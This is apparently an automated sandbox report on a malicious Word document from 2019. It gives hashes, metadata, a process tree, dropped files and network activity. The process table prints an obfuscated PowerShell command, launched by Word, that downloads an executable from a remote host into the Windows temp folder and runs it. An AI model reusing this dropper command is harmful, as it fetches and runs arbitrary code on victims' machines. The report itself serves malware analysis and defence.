File name: | We_Laugh_We_Love.doc |
Full analysis: | https://app.any.run/tasks/0a97721a-baa4-406b-85ed-e75af255842a |
Verdict: | Malicious activity |
Analysis date: | December 02, 2019, 21:26:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 22 10:54:00 2019, Last Saved Time/Date: Mon Apr 22 10:54:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 7F620E3FE4AA92297214D143F62BECAA |
SHA1: | 22B47038834853D3B473461E320D1522ECCAECC5 |
SHA256: | 8F9C05736855B50FE10D732B0F800ED01A0EB475F116EAF956F9180801CA8721 |
SSDEEP: | 768:h0/MMMm5Mpuhw8INgixD6JpPukZq+8sw556/zT8OeNHA917YIcs/MVkWDfxz99N9:hZ17xD0pPuH+aK3OAbUQ/lWDf3vUI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 63488 |
Company: | office |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:22 09:54:00 |
CreateDate: | 2019:04:22 09:54:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | Admin |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | admin |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
460 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\We_Laugh_We_Love.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3636 | powershell iex('$weLMKtIE = ncJh97Byew-object -comcJh97ByobjcJh97Byect wsccJh97Byript.shecJh97Byll;$yVQML = ncJh97Byew-object syscJh97Bytem.net.webcJh97Byclient;$amRY2JXt = ncJh97Byew-objcJh97Byect rancJh97Bydom;$L94gJQP = \"cJh97ByhcJh97BytcJh97BytcJh97BypcJh97Bys://the.earth.li/~sgtatham/putty/0.68/w32/putty.exe\".splcJh97Byit(\",\");$ueOG6E = $amRY2JXt.nexcJh97Byt(1, 65536);$kMjp6 = \"c:\wicJh97ByncJh97BydowcJh97Bys\temcJh97Byp\245.excJh97Bye\";cJh97ByforcJh97ByecJh97Byach($USiqs icJh97Byn $L94gJQP){tcJh97ByrcJh97Byy{$yVQML.dowcJh97ByncJh97Byloadfile($USiqs.ToScJh97Bytring(), $kMjp6);stacJh97Byrt-procJh97Bycess $kMjp6;break;}ccJh97ByatccJh97Byh{}}'.replace('cJh97By', '')); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3768 | "C:\windows\temp\245.exe" | C:\windows\temp\245.exe | — | powershell.exe |
User: admin Company: Simon Tatham Integrity Level: MEDIUM Description: SSH, Telnet and Rlogin client Version: Release 0.68 |
PID | Process | Filename | Type | |
---|---|---|---|---|
460 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDDDC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3636 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N30T68S05Q25EOIO7JIP.temp | — | |
MD5:— | SHA256:— | |||
460 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:645C766CD7A3C40CF0838FA2C9DEAFA8 | SHA256:C0958FA59779C6A0BEF829C97D404F828206ED8186BE37CCEE6ECBD88931BC82 | |||
460 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F5743C90D1A676FAE81742B0CF2FDF3F | SHA256:F4E39BE12C32DD01520D4D30C3D5B834E87CD3F96667AA40FA6B99FA66DDB625 | |||
3636 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
3636 | powershell.exe | C:\windows\temp\245.exe | executable | |
MD5:725F4C6C672958B86989731308E70E1E | SHA256:1A0D4FE1B3758B1E8A66FB1AABC92590ACFC543D66E5EFE6779206C426B412E1 | |||
460 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_Laugh_We_Love.doc | pgc | |
MD5:589E04AFE386D1B8C8F3AE4216992F97 | SHA256:7B19DA888E73AE603815908943A6DB4D61B3AEE144D2E3AD60639A32D04B46F1 | |||
3636 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF38e917.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3636 | powershell.exe | 46.43.34.31:443 | the.earth.li | Bytemark Limited | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
the.earth.li |
| whitelisted |